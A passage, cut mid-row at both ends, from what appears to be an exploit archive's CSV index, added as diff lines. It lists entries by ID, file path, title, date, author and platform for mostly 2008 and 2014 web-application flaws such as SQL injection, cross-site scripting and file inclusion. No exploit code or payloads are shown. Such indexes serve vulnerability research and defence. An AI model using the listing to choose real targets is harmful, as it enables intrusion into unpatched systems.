(2)",2008-01-25,"Omer Singer",webapps,php, +31063,exploits/php/webapps/31063.txt,"WebCalendar 1.1.6 - 'pref.php' Cross-Site Scripting",2008-01-25,"Omer Singer",webapps,php, +31064,exploits/php/webapps/31064.txt,"WebCalendar 1.1.6 - 'search.php' Cross-Site Scripting",2008-01-25,"Omer Singer",webapps,php, +31065,exploits/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 - 'report_type' Cross-Site Scripting",2008-01-26,nnposter,webapps,php, +31066,exploits/php/webapps/31066.txt,"Mambo Module MOStlyCE 2.4 - 'connector.php' Cross-Site Scripting",2008-01-28,AmnPardaz,webapps,php, +31067,exploits/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Inclusion",2008-01-28,p4imi0,webapps,php, +31068,exploits/php/webapps/31068.txt,"Mambo Module MOStlyCE 2.4 Image Manager Utility - Arbitrary File Upload",2008-01-28,AmnPardaz,webapps,php, +31069,exploits/php/webapps/31069.txt,"eTicket 1.5.6-RC4 - 'index.php' Cross-Site Scripting",2008-01-28,jekil,webapps,php, +31070,exploits/asp/webapps/31070.txt,"ASPired2Protect Login Page - SQL Injection",2008-01-28,T_L_O_T_D,webapps,asp, +31071,exploits/cgi/webapps/31071.txt,"VB Marketing - 'tseekdir.cgi' Local File Inclusion",2008-01-28,"Sw33t h4cK3r",webapps,cgi, +31073,exploits/java/webapps/31073.html,"SunGard Banner Student 7.3 - 'add1' Cross-Site Scripting",2008-01-29,"Brendan M. Hickey",webapps,java, +31074,exploits/php/webapps/31074.txt,"Nucleus CMS 3.22 - 'action.php' Cross-Site Scripting",2008-01-20,"Alexandr Polyakov",webapps,php, +31075,exploits/php/webapps/31075.txt,"AmpJuke 0.7 - 'index.php' Cross-Site Scripting",2008-01-29,ShaFuck31,webapps,php, +31077,exploits/php/webapps/31077.txt,"Joomla! / Mambo Component com_buslicense - 'aid' SQL Injection",2008-01-30,S@BUN,webapps,php, +31079,exploits/php/webapps/31079.txt,"webSPELL 4.1.2 - 'whoisonline.php' Cross-Site Scripting",2008-01-30,NBBN,webapps,php, +31080,exploits/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri - 'index.php' SQL Injection",2008-01-30,ShaFuck31,webapps,php, +31081,exploits/cgi/webapps/31081.txt,"OpenBSD 4.1 - bgplg 'cmd' Cross-Site Scripting",2007-10-10,"Anton Karpov",webapps,cgi, +31084,exploits/php/webapps/31084.txt,"Archimede Net 2000 - 'E-Guest_show.php' SQL Injection",2008-02-01,"Sw33t h4cK3r",webapps,php, +31085,exploits/php/webapps/31085.txt,"Doodle4Gift - Multiple Vulnerabilities",2014-01-20,Dr.NaNo,webapps,php,80 +31086,exploits/php/webapps/31086.php,"AfterLogic Pro and Lite 7.1.1.1 - Persistent Cross-Site Scripting",2014-01-20,"Saeed reza Zamanian",webapps,php,80 +31087,exploits/hardware/webapps/31087.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - Persistent Cross-Site Scripting",2014-01-20,"Rakesh S",webapps,hardware,80 +31088,exploits/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset",2014-01-20,KAI,webapps,hardware,80 +31091,exploits/php/webapps/31091.txt,"Domain Trader 2.0 - 'catalog.php' Cross-Site Scripting",2008-02-02,Crackers_Child,webapps,php, +31092,exploits/php/webapps/31092.txt,"WordPress Plugin WP-Footnotes 2.2 - Multiple Remote Vulnerabilities",2008-02-02,NBBN,webapps,php, +31093,exploits/php/webapps/31093.txt,"ITechClassifieds - 'viewcat.php?CatID' SQL Injection",2008-02-02,Crackers_Child,webapps,php, +31094,exploits/php/webapps/31094.txt,"ITechClassifieds - 'viewcat.php?CatID' Cross-Site Scripting",2008-02-02,Crackers_Child,webapps,php, +31096,exploits/php/webapps/31096.txt,"WordPress Plugin ShiftThis NewsLetter - SQL Injection",2008-02-03,S@BUN,webapps,php, +31097,exploits/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,webapps,php, +31098,exploits/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta - 'login.php' SQL Injection",2008-02-04,Psiczn,webapps,php, +31099,exploits/php/webapps/31099.txt,"Codice CMS - 'login.php' SQL Injection",2008-02-04,Psiczn,webapps,php, +31101,exploits/php/webapps/31101.txt,"HispaH YouTube Clone - 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,webapps,php, +31103,exploits/asp/webapps/31103.txt,"AstroSoft HelpDesk - '/operator/article/article_search_results.asp?txtSearch' Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",webapps,asp, +31104,exploits/asp/webapps/31104.txt,"AstroSoft HelpDesk - '/operator/article/article_attachment.asp?Attach_Id' Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",webapps,asp, +31107,exploits/php/webapps/31107.txt,"Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion",2008-02-04,Psiczn,webapps,php, +31108,exploits/php/webapps/31108.txt,"Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion",2008-02-04,Psiczn,webapps,php, +31109,exploits/php/webapps/31109.txt,"Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion",2008-02-04,Psiczn,webapps,php, +31110,exploits/php/webapps/31110.txt,"Portail Web PHP 2.5.1 - 'login.php' Remote File Inclusion",2008-02-04,Psiczn,webapps,php, +31111,exploits/php/webapps/31111.txt,"Download Management 1.00 for PHP-Fusion - Multiple Local File Inclusions",2008-02-05,Psiczn,webapps,php, +31112,exploits/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,webapps,php, +31115,exploits/php/webapps/31115.txt,"MyNews 1.6.x - 'hash' Cross-Site Scripting",2008-02-06,SkyOut,webapps,php, +31116,exploits/php/webapps/31116.txt,"Pagetool 1.07 - 'search_term' Cross-Site Scripting",2008-02-06,Phanter-Root,webapps,php, +31117,exploits/asp/webapps/31117.txt,"Ipswitch WS_FTP Server 6 - '/WSFTPSVR/FTPLogServer/LogViewer.asp' Authentication Bypass",2008-02-06,"Luigi Auriemma",webapps,asp, +31120,exploits/php/webapps/31120.txt,"MODx 0.9.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-07,"Alexandr Polyakov",webapps,php, +31121,exploits/php/webapps/31121.txt,"Joomla! / Mambo Component com_sermon 0.2 - 'gid' SQL Injection",2008-02-07,S@BUN,webapps,php, +31124,exploits/php/webapps/31124.txt,"Calimero.CMS 3.3 - 'id' Cross-Site Scripting",2008-02-08,Psiczn,webapps,php, +31125,exploits/php/webapps/31125.txt,"Joovili 2.1 - 'members_help.php' Remote File Inclusion",2008-02-08,Cr@zy_King,webapps,php, +31126,exploits/php/webapps/31126.txt,"S9Y Serendipity Freetag-plugin 2.95 - 'style' Cross-Site Scripting",2008-02-08,"Alexander Brachmann",webapps,php, +31129,exploits/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x - Installation Information Disclosure",2008-02-08,"Brook Powers",webapps,php, +31131,exploits/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 - '/index.php' SQL Injection / Cross-Site Scripting",2008-02-09,Houssamix,webapps,php, +31134,exploits/php/webapps/31134.txt,"VWar 1.5 - 'calendar.php' SQL Injection",2008-02-11,Pouya_Server,webapps,php, +31135,exploits/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component - Multiple SQL Injections",2008-02-11,breaker_unit,webapps,php, +31137,exploits/php/webapps/31137.txt,"Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' SQL Injection",2008-02-11,CheebaHawk215,webapps,php, +31140,exploits/php/webapps/31140.txt,"iTechClassifieds 3.03.057 - SQL Injection",2014-01-23,vinicius777,webapps,php, +31141,exploits/php/webapps/31141.txt,"godontologico 5 - SQL Injection",2014-01-23,vinicius777,webapps,php, +31142,exploits/php/webapps/31142.txt,"Simple E-document 1.31 - Authentication Bypass",2014-01-23,vinicius777,webapps,php, +31143,exploits/php/webapps/31143.txt,"PizzaInn_Project - SQL Injection",2014-01-23,vinicius777,webapps,php, +31144,exploits/php/webapps/31144.txt,"mySeatXT 0.2134 - SQL Injection",2014-01-23,vinicius777,webapps,php, +31145,exploits/php/webapps/31145.txt,"Easy POS System - 'login.php' SQL Injection",2014-01-23,vinicius777,webapps,php, +31146,exploits/php/webapps/31146.txt,"Cells Blog 3.3 - Reflected Cross-Site Scripting / Blind SQLite Injection",2014-01-23,vinicius777,webapps,php, +31147,exploits/php/webapps/31147.txt,"Adult WebMaster PHP - Password Disclosure",2014-01-23,vinicius777,webapps,php, +31154,exploits/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,webapps,php, +31155,exploits/php/webapps/31155.txt,"Joomla! / Mambo Component com_iomezun - 'id' SQL Injection",2008-02-12,S@BUN,webapps,php, +31156,exploits/php/webapps/31156.txt,"Cacti 0.8.7 - 'graph_view.php?graph_list' SQL Injection",2008-02-12,aScii,webapps,php, +31157,exploits/php/webapps/31157.txt,"Cacti 0.8.7 - 'graph.php?view_type' Cross-Site Scripting",2008-02-12,aScii,webapps,php, +31158,exploits/php/webapps/31158.txt,"Cacti 0.8.7 - 'graph_view.php?filter' Cross-Site Scripting",2008-02-12,aScii,webapps,php, +31159,exploits/php/webapps/31159.txt,"Cacti 0.8.7 - 'tree.php' Multiple SQL Injections",2008-02-12,aScii,webapps,php, +31160,exploits/php/webapps/31160.txt,"Cacti 0.8.7 - 'graph_xport.php?local_graph_id' SQL Injection",2008-02-12,aScii,webapps,php, +31161,exploits/php/webapps/31161.txt,"Cacti 0.8.7 - '/index.php/sql.php?Login Action login_username' SQL Injection",2008-02-12,aScii,webapps,php, +31162,exploits/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component - SQL Injection",2008-02-12,S@BUN,webapps,php, +31164,exploits/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' SQL Injection",2008-02-12,S@BUN,webapps,php, +31258,exploits/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,webapps,ios, +31335,exploits/php/webapps/31335.txt,"MG2 - 'list' Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",webapps,php, +40357,exploits/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",webapps,hardware,80 +31700,exploits/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,webapps,php, +31701,exploits/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Cross-Site Scripting",2008-04-24,ZoRLu,webapps,php, +31173,exploits/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",webapps,php,80 +31174,exploits/php/webapps/31174.txt,"Joomla! Component Komento 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",webapps,php,80 +31175,exploits/php/webapps/31175.txt,"Joomla! Component JV Comment 3.0.2 - 'id' SQL Injection",2014-01-24,"High-Tech Bridge SA",webapps,php,80 +31180,exploits/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",webapps,hardware,10001 +31183,exploits/php/webapps/31183.txt,"Skybluecanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",webapps,php,80 +31272,exploits/php/webapps/31272.txt,"Joomla! / Mambo Component com_Joomlavvz - 'id' SQL Injection",2008-02-20,S@BUN,webapps,php, +31273,exploits/php/webapps/31273.txt,"Joomla! / Mambo Component com_most - 'secid' SQL Injection",2008-02-21,S@BUN,webapps,php, +31274,exploits/php/webapps/31274.txt,"Joomla! / Mambo Component com_asortyment - 'katid' SQL Injection",2008-02-21,S@BUN,webapps,php, +31269,exploits/php/webapps/31269.txt,"Spyce 2.1.3 - '/spyce/examples/formtag.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",webapps,php, +31270,exploits/php/webapps/31270.txt,"Spyce 2.1.3 - spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",webapps,php, +31265,exploits/php/webapps/31265.txt,"Spyce 2.1.3 - '/docs/examples/redirect.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",webapps,php, +31266,exploits/php/webapps/31266.txt,"Spyce 2.1.3 - 'docs/examples/handlervalidate.spy?x' Cross-Site Scripting",2007-02-19,"Richard Brain",webapps,php, +31267,exploits/php/webapps/31267.txt,"Spyce 2.1.3 - 'spyce/examples/request.spy?name' Cross-Site Scripting",2007-02-19,"Richard Brain",webapps,php, +31268,exploits/php/webapps/31268.txt,"Spyce 2.1.3 - 'spyce/examples/getpost.spy?Name' Cross-Site Scripting",2007-02-19,"Richard Brain",webapps,php, +31189,exploits/java/webapps/31189.txt,"Cisco Unified Communications Manager 6.1 - 'key' SQL Injection",2008-02-13,"Nico Leidecker",webapps,java, +31191,exploits/asp/webapps/31191.txt,"Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injections",2008-02-13,S@BUN,webapps,asp, +31192,exploits/php/webapps/31192.txt,"Joomla! / Mambo Component com_model - 'objid' SQL Injection",2008-02-13,S@BUN,webapps,php, +31193,exploits/php/webapps/31193.txt,"Joomla! / Mambo Component com_omnirealestate - 'objid' SQL Injection",2008-02-13,S@BUN,webapps,php, +31194,exploits/php/webapps/31194.txt,"Dokeos 1.8.4 - 'whoisonline.php?id' SQL Injection",2008-02-15,"Alexandr Polyakov",webapps,php, +31195,exploits/php/webapps/31195.txt,"Dokeos 1.8.4 - 'main/inc/lib/events.lib.inc.php' Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",webapps,php, +31196,exploits/php/webapps/31196.txt,"Dokeos 1.8.4 - '/main/calendar/myagenda.php?courseCode' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",webapps,php, +31197,exploits/php/webapps/31197.txt,"Dokeos 1.8.4 - '/main/admin/course_category.php?category' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",webapps,php, +31198,exploits/php/webapps/31198.txt,"Dokeos 1.8.4 - '/main/admin/session_list.php?cmessage' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",webapps,php, +31199,exploits/php/webapps/31199.txt,"Dokeos 1.8.4 - '/main/mySpace/index.php?tracking_list_coaches_column' SQL Injection",2008-02-15,"Alexandr Polyakov",webapps,php, +31200,exploits/php/webapps/31200.txt,"Dokeos 1.8.4 - '/main/create_course/add_course.php?tutor_name' SQL Injection",2008-02-15,"Alexandr Polyakov",webapps,php, +31201,exploits/php/webapps/31201.txt,"artmedic webdesign weblog - Multiple Local File Inclusions",2008-02-14,muuratsalo,webapps,php, +31202,exploits/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,webapps,php, +31206,exploits/php/webapps/31206.txt,"Joomla! / Mambo Component com_smslist - 'listid' SQL Injection",2008-02-15,S@BUN,webapps,php, +31207,exploits/php/webapps/31207.txt,"Joomla! / Mambo Component com_activities - 'id' SQL Injection",2008-02-15,S@BUN,webapps,php, +31208,exploits/php/webapps/31208.txt,"Joomla! / Mambo Component com_sg - 'pid' SQL Injection",2008-02-15,S@BUN,webapps,php, +31209,exploits/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' SQL Injection",2008-02-15,S@BUN,webapps,php, +31210,exploits/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' SQL Injection",2008-02-15,S@BUN,webapps,php, +31211,exploits/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 - 'index.php' SQL Injection",2008-02-15,S@BUN,webapps,php, +31212,exploits/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' SQL Injection",2008-02-15,S@BUN,webapps,php, +31213,exploits/php/webapps/31213.txt,"Joomla! / Mambo Component com_salesrep - 'rid' SQL Injection",2008-02-15,S@BUN,webapps,php, +31214,exploits/php/webapps/31214.txt,"Joomla! / Mambo Component com_lexikon - 'id' SQL Injection",2008-02-16,S@BUN,webapps,php, +31215,exploits/php/webapps/31215.txt,"Joomla! / Mambo Component Filebase - 'filecatid' SQL Injection",2008-02-16,S@BUN,webapps,php, +31216,exploits/php/webapps/31216.txt,"Joomla! / Mambo Component com_scheduling - 'id' SQL Injection",2008-02-15,S@BUN,webapps,php, +31217,exploits/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,webapps,php, +32241,exploits/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,webapps,php, +32242,exploits/php/webapps/32242.txt,"PHP-Fusion 4.01 - 'readmore.php' SQL Injection",2008-08-13,Rake,webapps,php, +32243,exploits/php/webapps/32243.txt,"Nukeviet 2.0 - '/admin/login.php' Cookie Authentication Bypass",2008-08-13,Ciph3r,webapps,php, +32244,exploits/php/webapps/32244.txt,"YapBB 1.2 - 'class_yapbbcooker.php' Remote File Inclusion",2008-08-13,CraCkEr,webapps,php, +32245,exploits/php/webapps/32245.txt,"Nortel Networks SRG V16 - 'modules.php?module' Cross-Site Scripting",2008-08-13,CraCkEr,webapps,php, +32246,exploits/php/webapps/32246.txt,"Nortel Networks SRG V16 - 'admin_modules.php?module' Traversal Local File Inclusion",2008-08-13,CraCkEr,webapps,php, +32247,exploits/php/webapps/32247.txt,"Nortel Networks SRG V16 - 'modules.php?module' Traversal Local File Inclusion",2008-08-13,CraCkEr,webapps,php, +31221,exploits/windows/webapps/31221.txt,"Ability Mail Server 2013 -Persistent Cross-Site Scripting / Cross-Site Request Forgery (Password Reset)",2014-01-27,"David Um",webapps,windows, +31224,exploits/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' SQL Injection",2008-02-19,S@BUN,webapps,php, +31225,exploits/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,webapps,php, +31226,exploits/php/webapps/31226.txt,"Joomla! / Mambo Component com_detail - 'id' SQL Injection",2008-02-18,S@BUN,webapps,php, +31227,exploits/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,webapps,php, +31228,exploits/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' SQL Injection",2008-02-18,S@BUN,webapps,php, +31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php, +31230,exploits/php/webapps/31230.txt,"WordPress Plugin wp-people 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,webapps,php, +31233,exploits/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc?camnum' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple, +31234,exploits/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic?id' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple, +31235,exploits/php/webapps/31235.txt,"Jinzora 2.7.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",webapps,php, +31236,exploits/php/webapps/31236.txt,"Jinzora 2.7.5 - 'ajax_request.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",webapps,php, +31237,exploits/php/webapps/31237.txt,"Jinzora 2.7.5 - 'slim.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",webapps,php, +31238,exploits/php/webapps/31238.txt,"Jinzora 2.7.5 - 'popup.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",webapps,php, +31239,exploits/php/webapps/31239.txt,"Google Hack Honeypot File Upload Manager 1.3 - 'delall' Unauthorized File Access",2008-02-19,Mr-m07,webapps,php, +31240,exploits/php/webapps/31240.txt,"SmarterTools SmarterMail 4.3 - 'Subject' HTML Injection",2008-02-19,"Juan Pablo Lopez Yacubian",webapps,php, +31241,exploits/php/webapps/31241.txt,"PHP-Nuke Sections Module - 'artid' SQL Injection",2008-02-19,S@BUN,webapps,php, +31242,exploits/php/webapps/31242.txt,"Facile Forms 1.x - 'catid' SQL Injection",2008-02-19,S@BUN,webapps,php, +31243,exploits/php/webapps/31243.txt,"Joomla! / Mambo Component com_team - SQL Injection",2008-02-19,S@BUN,webapps,php, +31244,exploits/php/webapps/31244.txt,"Joomla! / Mambo Component com_iigcatalog - 'cat' SQL Injection",2008-02-19,S@BUN,webapps,php, +31245,exploits/php/webapps/31245.txt,"Joomla! / Mambo Component com_formtool - 'catid' SQL Injection",2008-02-19,S@BUN,webapps,php, +31246,exploits/php/webapps/31246.txt,"Joomla! / Mambo Component com_genealogy - 'id' SQL Injection",2008-02-19,S@BUN,webapps,php, +31247,exploits/php/webapps/31247.txt,"Joomla! Component iJoomla! com_magazine - 'pageid' SQL Injection",2008-02-19,S@BUN,webapps,php, +31248,exploits/php/webapps/31248.txt,"XOOPS 'vacatures' Module - 'cid' SQL Injection",2008-02-19,S@BUN,webapps,php, +31249,exploits/php/webapps/31249.txt,"XOOPS 'events' Module - 'id' SQL Injection",2008-02-19,S@BUN,webapps,php, +31250,exploits/php/webapps/31250.txt,"XOOPS 'seminars' Module - 'id' SQL Injection",2008-02-19,S@BUN,webapps,php, +31251,exploits/php/webapps/31251.txt,"XOOPS 'badliege' Module - 'id' SQL Injection",2008-02-19,S@BUN,webapps,php, +31252,exploits/php/webapps/31252.txt,"PHP-Nuke Web_Links Module - 'cid' SQL Injection",2008-02-19,S@BUN,webapps,php, +31256,exploits/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,webapps,php,80 +31331,exploits/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' SQL Injection",2008-03-04,"Aria-Security Team",webapps,php, +31332,exploits/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'Filename' Local File Inclusion",2008-03-04,The-0utl4w,webapps,php, +31528,exploits/php/webapps/31528.txt,"Le Forum - 'Fichier_Acceuil' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31261,exploits/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,webapps,hardware,443 +31262,exploits/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,webapps,php,80 +31263,exploits/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,webapps,php, +31275,exploits/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - 'Comments.asp?FC' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",webapps,asp, +31276,exploits/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - 'Labels.asp?Term' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",webapps,asp, +31277,exploits/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - 'ClassList.asp?Term' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",webapps,php, +31278,exploits/php/webapps/31278.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - 'GradebookStuScores.asp?GrdBk' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",webapps,php, +31280,exploits/php/webapps/31280.txt,"Joomla! / Mambo Component Referenzen - 'id' SQL Injection",2008-02-21,S@BUN,webapps,php, +31281,exploits/php/webapps/31281.txt,"PHP-Nuke Classifieds Module - 'Details' SQL Injection",2008-02-21,S@BUN,webapps,php, +31282,exploits/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 - 'print' Option SQL Injection",2008-02-21,S@BUN,webapps,php, +31283,exploits/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' SQL Injection",2008-02-21,S@BUN,webapps,php, +31284,exploits/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' SQL Injection",2008-02-21,S@BUN,webapps,php, +31286,exploits/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,webapps,asp, +31287,exploits/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' SQL Injection",2008-02-23,S@BUN,webapps,php, +31288,exploits/php/webapps/31288.txt,"Joomla! / Mambo Component com_hello_world - 'id' SQL Injection",2008-02-23,S@BUN,webapps,php, +31289,exploits/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module - 'artid' SQL Injection",2008-02-23,S@BUN,webapps,php, +31290,exploits/php/webapps/31290.txt,"AuraCMS 2.2 - 'lihatberita' Module SQL Injection",2008-02-23,S@BUN,webapps,php, +31291,exploits/php/webapps/31291.txt,"Joomla! / Mambo Component com_publication - 'pid' SQL Injection",2008-02-25,"Aria-Security Team",webapps,php, +31292,exploits/php/webapps/31292.txt,"Joomla! / Mambo Component com_blog - 'pid' SQL Injection",2008-02-25,"Aria-Security Team",webapps,php, +31293,exploits/php/webapps/31293.txt,"Gary's Cookbook 3.0 - 'id' SQL Injection",2008-02-25,S@BUN,webapps,php, +31294,exploits/php/webapps/31294.txt,"Softbiz Jokes and Funny Pictures Script - 'sbcat_id' SQL Injection",2008-02-25,-=Mizo=-,webapps,php, +31295,exploits/php/webapps/31295.txt,"Joomla! / Mambo Component com_wines 1.0 - 'id' SQL Injection",2008-02-25,S@BUN,webapps,php, +31296,exploits/php/webapps/31296.txt,"Galore Simple Shop 3.1 - 'section' SQL Injection",2008-02-25,S@BUN,webapps,php, +31297,exploits/php/webapps/31297.txt,"PHP-Nuke Sell Module - 'cid' SQL Injection",2008-02-25,"Aria-Security Team",webapps,php, +31299,exploits/jsp/webapps/31299.txt,"Alkacon OpenCMS 7.0.3 - 'tree_files.jsp' Cross-Site Scripting",2008-02-25,nnposter,webapps,jsp, +31303,exploits/php/webapps/31303.txt,"Joomla! / Mambo Component com_inter - 'id' SQL Injection",2008-02-25,The-0utl4w,webapps,php, +31304,exploits/php/webapps/31304.txt,"Plume CMS 1.2.2 - '/manager/xmedia.php' Cross-Site Scripting",2008-02-21,"Omer Singer",webapps,php, +31313,exploits/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure",2008-02-28,"Richard Brain",webapps,cgi, +31314,exploits/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - 'Username' Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",webapps,asp, +31315,exploits/php/webapps/31315.txt,"XRms 1.99.2 - CRM 'msg' Cross-Site Scripting",2008-02-28,vijayv,webapps,php, +31317,exploits/php/webapps/31317.txt,"NetOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload",2008-02-29,RawSecurity.org,webapps,php, +31318,exploits/php/webapps/31318.txt,"Centreon 1.4.2.3 - 'index.php' Local File Inclusion",2008-02-29,JosS,webapps,php, +31319,exploits/php/webapps/31319.txt,"Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting",2008-02-29,ZoRLu,webapps,php, +31320,exploits/php/webapps/31320.txt,"PHPMyTourney 2 - '/tourney/index.php' Remote File Inclusion",2008-02-29,"HACKERS PAL",webapps,php, +31321,exploits/php/webapps/31321.txt,"Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,webapps,php, +31322,exploits/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'Gaestebuch 2.2 Module - 'id' SQL Injection",2008-03-01,TurkishWarriorr,webapps,php, +31324,exploits/php/webapps/31324.txt,"KC Wiki 1.0 - '/minimal/wiki.php?page' Remote File Inclusion",2008-03-03,muuratsalo,webapps,php, +31325,exploits/php/webapps/31325.txt,"KC Wiki 1.0 - '/simplest/wiki.php?page' Remote File Inclusion",2008-03-03,muuratsalo,webapps,php, +31326,exploits/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure/HTML Injection / Cross-Site Scripting",2008-03-03,"Digital Security Research Group",webapps,php, +31328,exploits/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' HTML Injection",2008-03-03,Dominus,webapps,php, +31329,exploits/multiple/webapps/31329.txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution",2014-02-01,@u0x,webapps,multiple, +31337,exploits/php/webapps/31337.txt,"WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection",2007-06-25,Lupton,webapps,php, +31339,exploits/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' SQL Injection",2008-03-05,ZoRLu,webapps,php, +31341,exploits/php/webapps/31341.txt,"Yap Blog 1.1 - 'index.php' Remote File Inclusion",2008-03-06,THE_MILLER,webapps,php, +31344,exploits/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module - 'kid' SQL Injection",2008-03-06,r080cy90r,webapps,php, +31529,exploits/php/webapps/31529.txt,"Joomla! / Mambo Component Cinema 1.0 - 'id' SQL Injection",2008-03-23,S@BUN,webapps,php, +31350,exploits/php/webapps/31350.txt,"CiMe Citas Médicas - Multiple Vulnerabilities",2014-02-03,vinicius777,webapps,php,80 +31351,exploits/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 